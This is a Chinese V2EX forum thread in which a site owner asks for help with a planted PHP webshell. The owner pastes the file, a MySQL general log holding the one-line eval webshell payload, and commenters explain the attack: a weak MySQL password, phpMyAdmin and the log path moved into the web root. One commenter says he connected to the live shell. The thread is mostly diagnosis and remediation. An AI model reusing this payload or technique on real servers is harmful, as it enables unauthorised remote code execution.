首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  PHP

求助各位 v 友,网站根目录多了一个 wuwu11. PHP 的文件

  •  1
     
  •   fzxml · 2018-03-31 08:56:34 +08:00 · 4212 次点击
    这是一个创建于 592 天前的主题,其中的信息可能已经有所发展或是发生改变。

    阿里云云盾检测到发现后门 webshell 根目录多了一个 wuwu11.php 的文件, 内容是:

    D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
    TCP Port: 3306, Named Pipe: MySQL
    Time                 Id Command    Argument
    		65264 Init DB	mysql
    		65264 Query	SHOW TABLES FROM `mysql`
    		65264 Query	SHOW TABLE STATUS FROM `mysql`
    		65264 Query	SELECT CURRENT_USER()
    		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
    		65264 Query	SELECT CURRENT_USER()
    		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
    		65264 Quit	
    180330 19:55:36	65265 Connect	[email protected] on 
    		65265 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
    		65265 Init DB	mysql
    		65265 Init DB	mysql
    		65265 Query	select '<?php @eval($_POST[h])?>'
    		65265 Init DB	mysql
    		65265 Query	SHOW TABLES FROM `mysql`
    		65265 Query	SHOW TABLE STATUS FROM `mysql`
    		65265 Query	SELECT CURRENT_USER()
    		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
    		65265 Query	SELECT CURRENT_USER()
    		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
    		65265 Query	SHOW TABLES
    		65265 Quit	
    180330 19:55:37	65266 Connect	[email protected] on 
    		65266 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
    		65266 Init DB	mysql
    		65266 Init DB	mysql
    		65266 Query	set global general_log = 'Off'
    
    15 回复  |  直到 2018-08-20 15:51:16 +08:00
        1
    111111111111   2018-03-31 09:17:27 +08:00 via Android
    注入漏洞吧,服务器权限也没设置
        2
    cyn   2018-03-31 09:21:06 +08:00 via Android
    只会执行<?php @eval($_POST[h])?> 吗?
        3
    wukaichao   2018-03-31 09:25:17 +08:00 via iPhone
    注入吧,直接在读表了。
        4
    kuzhan   2018-03-31 09:26:33 +08:00 via Android
    都脱裤了 还问
        5
    zjsxwc   2018-03-31 09:29:20 +08:00
        6
    honkew   2018-03-31 09:53:16 +08:00
    @zjsxwc 竟然发出来了,我用 Cknife 连了一下 可以连上
        7
    Les1ie   2018-03-31 12:42:37 +08:00
    @honkew V2EX 上发自己服务器的一句话木马 翻车现场
        8
    janus77   2018-03-31 12:46:36 +08:00 via Android
    哈哈哈哈哈
        9
    sinver   2018-03-31 12:52:07 +08:00
    phpmyadmin 及各种弱口令.....感觉重装系统 及重新搭建网站和权限控制吧....
        10
    fange01   2018-03-31 13:00:34 +08:00
    @Les1ie 翻车现场,竟然还不处理。
    @honkew 哈哈哈哈
        11
    lifeintools   2018-03-31 14:05:00 +08:00
    还有网站源码。。你还不设置权限。。。。。
        12
    xuyl   2018-03-31 20:24:01 +08:00
    php 码农安全意识堪忧啊。
        13
    Tink   2018-03-31 23:22:25 +08:00 via iPhone
        14
    fanglongzong   2018-04-06 10:16:42 +08:00
    跟楼主一模一样的情况。

    完全是技术小白,不知道要怎么办……
        15
    maoxs2   2018-08-20 15:51:16 +08:00
    1. 不是我搞得,只是碰巧碰见了这个后门好几回
    2. 攻击点是 MySQL 弱密码+phpMyAdmin
    3. 注入点是日志文档保存路径修改至 apache 服务器解析文件夹(通过 phpinfo 获得 /phpstudy 等框架猜解)
    4. 解决方法删除它后续步骤放的别的后门程序( exe+服务),删除 wuwu11,修改 MySQL 弱密码,删掉 phpMyAdmin 或者修改路径或者加 http 认证啥的
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   1314 人在线   最高记录 5043   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 24ms · UTC 23:30 · PVG 07:30 · LAX 15:30 · JFK 18:30
    ♥ Do have faith in what you're doing.